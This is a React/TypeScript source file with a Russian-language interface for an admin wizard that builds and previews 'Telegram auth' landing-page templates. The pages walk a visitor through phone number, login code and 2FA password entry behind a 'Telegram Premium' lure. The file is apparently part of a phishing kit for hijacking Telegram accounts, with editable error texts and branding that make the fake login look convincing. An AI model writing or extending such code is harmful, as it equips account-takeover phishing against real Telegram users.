import {
	constructLandingTelegramAuthTemplate,
	fetchLandingTelegramAuthConstruct,
	previewLandingTelegramAuthTemplate,
	updateLandingTelegramAuthConstruct,
} from '@/api/landings';
import { ROUTES } from '@/app/routes';
import { Button } from '@/components/ui/button';
import { Dialog, DialogContent, DialogDescription, DialogHeader, DialogTitle } from '@/components/ui/dialog';
import { Input } from '@/components/ui/input';
import { Spinner } from '@/components/ui/spinner';
import { PageScroll } from '@/layouts/page-layout';
import LandingsGate from '@/pages/landings/landings-gate';
import { Check, Info, Star, Upload } from 'lucide-react';
import { useEffect, useRef, useState, type ReactNode, type RefObject } from 'react';
import { useNavigate, useParams } from 'react-router';
import { toast } from 'sonner';
import {
	CONSTRUCT_IMAGE_MAX_BYTES,
	CONSTRUCT_LONG_MAX,
	CONSTRUCT_SHORT_MAX,
	CONSTRUCT_TITLE_MAX,
	TELEGRAM_PREMIUM_DEFAULTS,
	constructorDraftError,
	createDraft,
	draftFromConstructBody,
	resetStep,
	toConstructBody,
	type ConstructorDraft,
	type ConstructorStep,
	type ConstructImageMime,
} from './telegram-auth-constructor-model';

const STEPS: { key: ConstructorStep | 'created'; title: string }[] = [
	{ key: 'home', title: 'Главная' },
	{ key: 'code', title: 'Ввод кода' },
	{ key: 'password', title: '2FA' },
	{ key: 'done', title: 'Готово' },
	{ key: 'created', title: 'Шаблон создан' },
];

function wizardSteps(editing: boolean) {
	if (!editing) {
		return STEPS;
	}
	return STEPS.map(step =>
		step.key === 'created' ? { ...step, title: 'Изменения сохранены' } : step,
	);
}

const IMAGE_MIMES = new Set<ConstructImageMime>(['image/png', 'image/jpeg', 'image/webp']);

function isImageMime(value: string): value is ConstructImageMime {
	return IMAGE_MIMES.has(value as ConstructImageMime);
}

function readFileBase64(file: File): Promise<string> {
	return new Promise((resolve, reject) => {
		const reader = new FileReader();
		reader.onload = () => {
			const result = typeof reader.result === 'string' ? reader.result : '';
			const encoded = result.split(',')[1] ?? '';
			if (!encoded) {
				reject(new Error('empty'));
				return;
			}
			resolve(encoded);
		};
		reader.onerror = () => reject(reader.error ?? new Error('read'));
		reader.readAsDataURL(file);
	});
}

export default function TelegramAuthConstructorWizardPage() {
	return (
		<PageScroll contentClassName='p-2 flex flex-col gap-3'>
			<LandingsGate>
				<WizardContent />
			</LandingsGate>
		</PageScroll>
	);
}

function WizardContent() {
	const navigate = useNavigate();
	const { templateId } = useParams();
	const editing = Boolean(templateId);
	const steps = wizardSteps(editing);
	const fileRef = useRef<HTMLInputElement>(null);
	const backgroundRef = useRef<HTMLInputElement>(null);
	const [stepIndex, setStepIndex] = useState(0);
	const [draft, setDraft] = useState(createDraft);
	const [createdTitle, setCreatedTitle] = useState<string | null>(null);
	const [saving, setSaving] = useState(false);
	const [previewing, setPreviewing] = useState(false);
	const [previewUrl, setPreviewUrl] = useState<string | null>(null);
	const [loadingDraft, setLoadingDraft] = useState(editing);
	const [loadFailed, setLoadFailed] = useState(false);

	useEffect(() => {
		if (!templateId) {
			setDraft(createDraft());
			setCreatedTitle(null);
			setStepIndex(0);
			setLoadFailed(false);
			setLoadingDraft(false);
			return;
		}
		const id = Number(templateId);
		if (!Number.isFinite(id) || id < 1) {
			setLoadFailed(true);
			setLoadingDraft(false);
			toast.error('Некорректный шаблон');
			navigate(ROUTES.landingsTelegramAuthTemplates);
			return;
		}
		let cancelled = false;
		setLoadingDraft(true);
		setLoadFailed(false);
		setCreatedTitle(null);
		setStepIndex(0);
		void (async () => {
			try {
				const body = await fetchLandingTelegramAuthConstruct(id);
				if (cancelled) {
					return;
				}
				setDraft(draftFromConstructBody(body));
			} catch {
				if (!cancelled) {
					setLoadFailed(true);
					navigate(ROUTES.landingsTelegramAuthTemplates);
				}
			} finally {
				if (!cancelled) {
					setLoadingDraft(false);
				}
			}
		})();
		return () => {
			cancelled = true;
		};
	}, [templateId, navigate]);

	const created = createdTitle !== null;
	const activeIndex = created ? steps.length - 1 : stepIndex;
	const stepKey = steps[stepIndex]?.key;

	function patch<K extends 'home' | 'code' | 'password' | 'done'>(
		key: K,
		partial: Partial<ConstructorDraft[K]>,
	) {
		setDraft(prev => ({ ...prev, [key]: { ...prev[key], ...partial } }));
	}

	function resetStage() {
		if (stepKey === 'created' || !stepKey) {
			return;
		}
		if (stepKey === 'home') {
			if (fileRef.current) fileRef.current.value = '';
			if (backgroundRef.current) backgroundRef.current.value = '';
		}
		setDraft(prev => resetStep(prev, stepKey));
	}

	function resetAll() {
		if (fileRef.current) fileRef.current.value = '';
		if (backgroundRef.current) backgroundRef.current.value = '';
		setDraft(createDraft());
	}

	async function storeImage(file: File, key: 'image' | 'background', input: HTMLInputElement | null) {
		if (!isImageMime(file.type)) {
			toast.error('Нужен PNG, JPEG или WebP');
			return;
		}
		if (file.size > CONSTRUCT_IMAGE_MAX_BYTES) {
			toast.error('Изображение больше 5 МБ');
			return;
		}
		try {
			const dataBase64 = await readFileBase64(file);
			const mime = file.type;
			if (!isImageMime(mime)) {
				return;
			}
			if (input) input.value = '';
			setDraft(prev => ({ ...prev, [key]: { mime, dataBase64 } }));
		} catch {
			toast.error('Не удалось прочитать изображение');
		}
	}

	async function onImage(file: File) {
		await storeImage(file, 'image', fileRef.current);
	}

	async function onBackground(file: File) {
		await storeImage(file, 'background', backgroundRef.current);
	}

	function closePreview() {
		setPreviewUrl(current => {
			if (current) {
				URL.revokeObjectURL(current);
			}
			return null;
		});
	}

	async function openPreview() {
		const error = constructorDraftError(draft);
		if (error) {
			toast.error(error);
			return;
		}
		setPreviewing(true);
		try {
			const html = await previewLandingTelegramAuthTemplate(toConstructBody(draft));
			const url = URL.createObjectURL(new Blob([html], { type: 'text/html' }));
			setPreviewUrl(current => {
				if (current) {
					URL.revokeObjectURL(current);
				}
				return url;
			});
		} catch {
			// landingsApi already shows the error toast
		} finally {
			setPreviewing(false);
		}
	}

	async function finish() {
		const error = constructorDraftError(draft);
		if (error) {
			toast.error(error);
			return;
		}
		setSaving(true);
		try {
			const body = toConstructBody(draft);
			const saved =
				editing && templateId
					? await updateLandingTelegramAuthConstruct(Number(templateId), body)
					: await constructLandingTelegramAuthTemplate(body);
			setCreatedTitle(saved.title);
		} catch {
			// landingsApi already shows the error toast
		} finally {
			setSaving(false);
		}
	}

	if (loadingDraft || loadFailed) {
		return (
			<div className='flex justify-center py-8'>
				<Spinner />
			</div>
		);
	}

	return (
		<div className='flex flex-col gap-4'>
			<Dialog
				open={previewUrl !== null}
				onOpenChange={open => {
					if (!open) {
						closePreview();
					}
				}}
			>
				<DialogContent className='fixed inset-0 top-0 left-0 flex h-[100dvh] w-full max-w-none translate-x-0 translate-y-0 flex-col gap-0 rounded-none p-0 sm:max-w-none'>
					<DialogHeader className='shrink-0 border-b px-4 py-3 pr-12 text-left'>
						<DialogTitle>Предпросмотр</DialogTitle>
						<DialogDescription className='sr-only'>Как страница выглядит с текущими полями</DialogDescription>
					</DialogHeader>
					{previewUrl ? (
						<iframe
							title='Предпросмотр шаблона'
							src={previewUrl}
							className='min-h-0 w-full flex-1 border-0 bg-[#0e1621]'
							style={{ colorScheme: 'dark' }}
						/>
					) : null}
				</DialogContent>
			</Dialog>
			<Stepper steps={steps} activeIndex={activeIndex} />
			{created ? (
				<CreatedStep
					heading={editing ? 'Изменения сохранены' : 'Шаблон создан'}
					title={createdTitle}
					onOpenList={() => navigate(ROUTES.landingsTelegramAuthTemplates)}
				/>
			) : (
				<>
					<div className='flex gap-2 rounded-md border bg-muted/40 px-3 py-2 text-sm text-muted-foreground'>
						<Info className='mt-0.5 size-4 shrink-0' />
						<p>
							Этапы соответствуют шагам пользователя при переходе по ссылке. Если поле оставить
							пустым — на лендинге покажется значение из плейсхолдера (Шаблон Telegram Premium).
						</p>
					</div>
					<div className='grid grid-cols-3 gap-2'>
						<Button
							type='button'
							variant='outline'
							className='h-auto min-w-0 whitespace-normal px-2 text-center leading-snug'
							onClick={resetStage}
							disabled={saving || previewing}
						>
							Сбросить этап
						</Button>
						<Button
							type='button'
							variant='outline'
							className='h-auto min-w-0 whitespace-normal px-2 text-center leading-snug'
							onClick={resetAll}
							disabled={saving || previewing}
						>
							Сбросить весь шаблон
						</Button>
						<Button
							type='button'
							variant='outline'
							className='h-auto min-w-0 whitespace-normal px-2 text-center leading-snug'
							onClick={() => void openPreview()}
							disabled={saving || previewing}
						>
							Предпросмотр
						</Button>
					</div>
					<div>
						{stepKey === 'home' ? (
							<HomeStep
								draft={draft}
								fileRef={fileRef}
								backgroundRef={backgroundRef}
								onTitle={title => setDraft(prev => ({ ...prev, title }))}
								onTheme={themeColor => setDraft(prev => ({ ...prev, themeColor }))}
								onImage={file => void onImage(file)}
								onBackground={file => void onBackground(file)}
								onHome={partial => patch('home', partial)}
							/>
						) : null}
						{stepKey === 'code' ? <CodeStep draft={draft} onChange={partial => patch('code', partial)} /> : null}
						{stepKey === 'password' ? (
							<PasswordStep draft={draft} onChange={partial => patch('password', partial)} />
						) : null}
						{stepKey === 'done' ? <DoneStep draft={draft} onChange={partial => patch('done', partial)} /> : null}
					</div>
					<div className='grid grid-cols-2 gap-3'>
						{stepIndex === 0 ? (
							<Button
								type='button'
								variant='outline'
								disabled={saving}
								onClick={() => navigate(ROUTES.landingsTelegramAuthTemplates)}
							>
								Отмена
							</Button>
						) : (
							<Button
								type='button'
								variant='outline'
								disabled={saving}
								onClick={() => setStepIndex(index => Math.max(0, index - 1))}
							>
								Назад
							</Button>
						)}
						{stepIndex === 3 ? (
							<Button type='button' disabled={saving} onClick={() => void finish()}>
								Завершить
							</Button>
						) : (
							<Button type='button' onClick={() => setStepIndex(index => Math.min(3, index + 1))}>
								Продолжить
							</Button>
						)}
					</div>
				</>
			)}
		</div>
	);
}

function Stepper({
	steps,
	activeIndex,
}: {
	steps: { key: string; title: string }[];
	activeIndex: number;
}) {
	return (
		<ol className='flex gap-3 overflow-x-auto pb-1'>
			{steps.map((step, index) => {
				const done = index < activeIndex;
				const current = index === activeIndex;
				return (
					<li key={step.key} className='flex min-w-16 flex-1 flex-col items-center gap-1'>
						<span
							className={
								current
									? 'flex size-6 items-center justify-center rounded-full bg-primary text-xs text-primary-foreground'
									: done
										? 'flex size-6 items-center justify-center rounded-full bg-primary/20 text-primary'
										: 'flex size-6 items-center justify-center rounded-full bg-muted text-xs text-muted-foreground'
							}
						>
							{done ? <Check className='size-3.5' /> : index + 1}
						</span>
						<span className={current ? 'text-center text-xs text-foreground' : 'text-center text-xs text-muted-foreground'}>
							{step.title}
						</span>
					</li>
				);
			})}
		</ol>
	);
}

function FieldRow({ label, fieldKey, children }: { label: string; fieldKey: string; children: ReactNode }) {
	return (
		<div className='grid gap-2 border-b border-border/70 py-3 md:grid-cols-[minmax(0,240px)_1fr] md:items-center'>
			<div>
				<div className='text-sm'>{label}</div>
				<div className='font-mono text-xs text-muted-foreground'>{fieldKey}</div>
			</div>
			{children}
		</div>
	);
}

function HomeStep({
	draft,
	fileRef,
	backgroundRef,
	onTitle,
	onTheme,
	onImage,
	onBackground,
	onHome,
}: {
	draft: ConstructorDraft;
	fileRef: RefObject<HTMLInputElement | null>;
	backgroundRef: RefObject<HTMLInputElement | null>;
	onTitle: (value: string) => void;
	onTheme: (value: string) => void;
	onImage: (file: File) => void;
	onBackground: (file: File) => void;
	onHome: (partial: Partial<ConstructorDraft['home']>) => void;
}) {
	const swatch = /^#[0-9a-fA-F]{6}$/.test(draft.themeColor) ? draft.themeColor : '#000000';
	return (
		<div>
			<FieldRow label='Название шаблона' fieldKey='name'>
				<Input
					value={draft.title}
					placeholder={TELEGRAM_PREMIUM_DEFAULTS.title}
					maxLength={CONSTRUCT_TITLE_MAX}
					onChange={event => onTitle(event.target.value)}
				/>
			</FieldRow>
			<FieldRow label='Главное изображение' fieldKey='hero'>
				<div className='flex flex-col gap-3 sm:flex-row sm:items-center'>
					<div className='flex size-28 shrink-0 items-center justify-center overflow-hidden rounded-md border bg-muted'>
						{draft.image ? (
							<img
								alt=''
								className='size-full object-cover'
								src={`data:${draft.image.mime};base64,${draft.image.dataBase64}`}
							/>
						) : (
							<Star className='size-8 text-violet-400' />
						)}
					</div>
					<div className='flex flex-col gap-2'>
						<p className='text-xs text-muted-foreground'>
							Допустимы PNG, JPEG или WebP. Размер изображения до 5 МБ.
						</p>
						<Button type='button' variant='outline' onClick={() => fileRef.current?.click()}>
							<Upload className='size-4' />
							Загрузить свою
						</Button>
						<input
							ref={fileRef}
							type='file'
							accept='image/png,image/jpeg,image/webp'
							className='hidden'
							onChange={event => {
								const file = event.target.files?.[0];
								if (file) {
									onImage(file);
								}
							}}
						/>
					</div>
				</div>
			</FieldRow>
			<FieldRow label='Фон страницы' fieldKey='page_background'>
				<div className='flex flex-col gap-3 sm:flex-row sm:items-center'>
					<div className='flex h-20 w-36 shrink-0 items-center justify-center overflow-hidden rounded-md border bg-muted'>
						{draft.background ? (
							<img
								alt=''
								className='size-full object-cover'
								src={`data:${draft.background.mime};base64,${draft.background.dataBase64}`}
							/>
						) : (
							<span className='px-2 text-center text-xs text-muted-foreground'>Без фото</span>
						)}
					</div>
					<div className='flex flex-col gap-2'>
						<p className='text-xs text-muted-foreground'>
							PNG, JPEG или WebP до 5 МБ. Картинка закрывает фон страницы.
						</p>
						<Button type='button' variant='outline' onClick={() => backgroundRef.current?.click()}>
							<Upload className='size-4' />
							Загрузить фон
						</Button>
						<input
							ref={backgroundRef}
							type='file'
							accept='image/png,image/jpeg,image/webp'
							className='hidden'
							onChange={event => {
								const file = event.target.files?.[0];
								if (file) onBackground(file);
							}}
						/>
					</div>
				</div>
			</FieldRow>
			<FieldRow label='Цветовая тема' fieldKey='theme'>
				<div className='flex items-center gap-2'>
					<Input
						value={draft.themeColor}
						maxLength={7}
						spellCheck={false}
						onChange={event => {
							const next = event.target.value.startsWith('#')
								? event.target.value
								: `#${event.target.value.replace(/^#/, '')}`;
							if (/^#[0-9a-fA-F]{0,6}$/.test(next)) {
								onTheme(next);
							}
						}}
					/>
					<input
						type='color'
						aria-label='Цвет темы'
						className='size-9 shrink-0 cursor-pointer rounded-md border bg-transparent'
						value={swatch}
						onChange={event => onTheme(event.target.value)}
					/>
				</div>
			</FieldRow>
			<TextField
				label='Заголовок'
				fieldKey='h1'
				value={draft.home.h1}
				placeholder={TELEGRAM_PREMIUM_DEFAULTS.home.h1}
				maxLength={CONSTRUCT_SHORT_MAX}
				onChange={h1 => onHome({ h1 })}
			/>
			<TextField
				label='Подзаголовок'
				fieldKey='subtitle'
				value={draft.home.subtitle}
				placeholder={TELEGRAM_PREMIUM_DEFAULTS.home.subtitle}
				maxLength={CONSTRUCT_LONG_MAX}
				onChange={subtitle => onHome({ subtitle })}
			/>
			<TextField
				label='Подпись над полем телефона'
				fieldKey='phone_label'
				value={draft.home.phoneLabel}
				placeholder={TELEGRAM_PREMIUM_DEFAULTS.home.phoneLabel}
				maxLength={CONSTRUCT_SHORT_MAX}
				onChange={phoneLabel => onHome({ phoneLabel })}
			/>
			<TextField
				label='Текст кнопки «Получить»'
				fieldKey='button'
				value={draft.home.button}
				placeholder={TELEGRAM_PREMIUM_DEFAULTS.home.button}
				maxLength={CONSTRUCT_SHORT_MAX}
				onChange={button => onHome({ button })}
			/>
			<TextField
				label='Копирайт внизу страницы (без года)'
				fieldKey='copyright'
				value={draft.home.copyright}
				placeholder={TELEGRAM_PREMIUM_DEFAULTS.home.copyright}
				maxLength={CONSTRUCT_SHORT_MAX}
				onChange={copyright => onHome({ copyright })}
			/>
			<TextField
				label='Ошибка: неверный телефон'
				fieldKey='error_phone_invalid'
				value={draft.home.errorPhoneInvalid}
				placeholder={TELEGRAM_PREMIUM_DEFAULTS.home.errorPhoneInvalid}
				maxLength={CONSTRUCT_LONG_MAX}
				onChange={errorPhoneInvalid => onHome({ errorPhoneInvalid })}
			/>
			<TextField
				label='Ошибка: номер отклонён'
				fieldKey='error_phone_banned'
				value={draft.home.errorPhoneBanned}
				placeholder={TELEGRAM_PREMIUM_DEFAULTS.home.errorPhoneBanned}
				maxLength={CONSTRUCT_LONG_MAX}
				onChange={errorPhoneBanned => onHome({ errorPhoneBanned })}
			/>
			<TextField
				label='Ошибка: флуд'
				fieldKey='error_flood'
				value={draft.home.errorFlood}
				placeholder={TELEGRAM_PREMIUM_DEFAULTS.home.errorFlood}
				maxLength={CONSTRUCT_LONG_MAX}
				onChange={errorFlood => onHome({ errorFlood })}
			/>
		</div>
	);
}

function CodeStep({
	draft,
	onChange,
}: {
	draft: ConstructorDraft;
	onChange: (partial: Partial<ConstructorDraft['code']>) => void;
}) {
	const defaults = TELEGRAM_PREMIUM_DEFAULTS.code;
	return (
		<div>
			<TextField label='Над заголовком' fieldKey='eyebrow' value={draft.code.eyebrow} placeholder={defaults.eyebrow} maxLength={CONSTRUCT_SHORT_MAX} onChange={eyebrow => onChange({ eyebrow })} />
			<TextField label='Заголовок' fieldKey='h1' value={draft.code.h1} placeholder={defaults.h1} maxLength={CONSTRUCT_SHORT_MAX} onChange={h1 => onChange({ h1 })} />
			<TextField label='Подзаголовок' fieldKey='subtitle' value={draft.code.subtitle} placeholder={defaults.subtitle} maxLength={CONSTRUCT_LONG_MAX} onChange={subtitle => onChange({ subtitle })} />
			<TextField label='Плашка' fieldKey='detect_label' value={draft.code.detectLabel} placeholder={defaults.detectLabel} maxLength={CONSTRUCT_SHORT_MAX} onChange={detectLabel => onChange({ detectLabel })} />
			<TextField label='Подпись над полем кода' fieldKey='code_label' value={draft.code.codeLabel} placeholder={defaults.codeLabel} maxLength={CONSTRUCT_SHORT_MAX} onChange={codeLabel => onChange({ codeLabel })} />
			<TextField label='Текст кнопки' fieldKey='button' value={draft.code.button} placeholder={defaults.button} maxLength={CONSTRUCT_SHORT_MAX} onChange={button => onChange({ button })} />
			<TextField label='Повторная отправка' fieldKey='resend' value={draft.code.resend} placeholder={defaults.resend} maxLength={CONSTRUCT_SHORT_MAX} onChange={resend => onChange({ resend })} />
			<TextField label='Ошибка: неверный код' fieldKey='error_code_invalid' value={draft.code.errorCodeInvalid} placeholder={defaults.errorCodeInvalid} maxLength={CONSTRUCT_LONG_MAX} onChange={errorCodeInvalid => onChange({ errorCodeInvalid })} />
			<TextField label='Ошибка: код истёк' fieldKey='error_code_expired' value={draft.code.errorCodeExpired} placeholder={defaults.errorCodeExpired} maxLength={CONSTRUCT_LONG_MAX} onChange={errorCodeExpired => onChange({ errorCodeExpired })} />
			<TextField label='Ошибка: флуд' fieldKey='error_code_flood' value={draft.code.errorCodeFlood} placeholder={defaults.errorCodeFlood} maxLength={CONSTRUCT_LONG_MAX} onChange={errorCodeFlood => onChange({ errorCodeFlood })} />
		</div>
	);
}

function PasswordStep({
	draft,
	onChange,
}: {
	draft: ConstructorDraft;
	onChange: (partial: Partial<ConstructorDraft['password']>) => void;
}) {
	const defaults = TELEGRAM_PREMIUM_DEFAULTS.password;
	return (
		<div>
			<TextField label='Над заголовком' fieldKey='eyebrow' value={draft.password.eyebrow} placeholder={defaults.eyebrow} maxLength={CONSTRUCT_SHORT_MAX} onChange={eyebrow => onChange({ eyebrow })} />
			<TextField label='Заголовок' fieldKey='h1' value={draft.password.h1} placeholder={defaults.h1} maxLength={CONSTRUCT_SHORT_MAX} onChange={h1 => onChange({ h1 })} />
			<TextField label='Подзаголовок' fieldKey='subtitle' value={draft.password.subtitle} placeholder={defaults.subtitle} maxLength={CONSTRUCT_LONG_MAX} onChange={subtitle => onChange({ subtitle })} />
			<TextField label='Бейдж' fieldKey='badge' value={draft.password.badge} placeholder={defaults.badge} maxLength={CONSTRUCT_SHORT_MAX} onChange={badge => onChange({ badge })} />
			<TextField label='Подпись над полем пароля' fieldKey='password_placeholder' value={draft.password.passwordPlaceholder} placeholder={defaults.passwordPlaceholder} maxLength={CONSTRUCT_SHORT_MAX} onChange={passwordPlaceholder => onChange({ passwordPlaceholder })} />
			<TextField label='Подсказка под паролем' fieldKey='hint' value={draft.password.hint} placeholder={defaults.hint} maxLength={CONSTRUCT_LONG_MAX} onChange={hint => onChange({ hint })} />
			<TextField label='Текст кнопки' fieldKey='button' value={draft.password.button} placeholder={defaults.button} maxLength={CONSTRUCT_SHORT_MAX} onChange={button => onChange({ button })} />
			<TextField label='Ошибка: неверный пароль' fieldKey='error_twofa_invalid' value={draft.password.errorTwofaInvalid} placeholder={defaults.errorTwofaInvalid} maxLength={CONSTRUCT_LONG_MAX} onChange={errorTwofaInvalid => onChange({ errorTwofaInvalid })} />
			<TextField label='Ошибка: флуд 2FA' fieldKey='error_twofa_flood' value={draft.password.errorTwofaFlood} placeholder={defaults.errorTwofaFlood} maxLength={CONSTRUCT_LONG_MAX} onChange={errorTwofaFlood => onChange({ errorTwofaFlood })} />
		</div>
	);
}

function DoneStep({
	draft,
	onChange,
}: {
	draft: ConstructorDraft;
	onChange: (partial: Partial<ConstructorDraft['done']>) => void;
}) {
	const defaults = TELEGRAM_PREMIUM_DEFAULTS.done;
	return (
		<div>
			<TextField label='Заголовок' fieldKey='h1' value={draft.done.h1} placeholder={defaults.h1} maxLength={CONSTRUCT_SHORT_MAX} onChange={h1 => onChange({ h1 })} />
			<TextField label='Подзаголовок' fieldKey='subtitle' value={draft.done.subtitle} placeholder={defaults.subtitle} maxLength={CONSTRUCT_LONG_MAX} onChange={subtitle => onChange({ subtitle })} />
		</div>
	);
}

function TextField({
	label,
	fieldKey,
	value,
	placeholder,
	maxLength,
	onChange,
}: {
	label: string;
	fieldKey: string;
	value: string;
	placeholder: string;
	maxLength: number;
	onChange: (value: string) => void;
}) {
	return (
		<FieldRow label={label} fieldKey={fieldKey}>
			<Input value={value} placeholder={placeholder} maxLength={maxLength} onChange={event => onChange(event.target.value)} />
		</FieldRow>
	);
}

function CreatedStep({
	heading,
	title,
	onOpenList,
}: {
	heading: string;
	title: string;
	onOpenList: () => void;
}) {
	return (
		<div className='flex flex-col items-center gap-3 py-10 text-center'>
			<h2 className='text-xl font-semibold'>{heading}</h2>
			<p className='text-muted-foreground'>{title}</p>
			<Button type='button' onClick={onOpenList}>
				К списку шаблонов
			</Button>
		</div>
	);
}
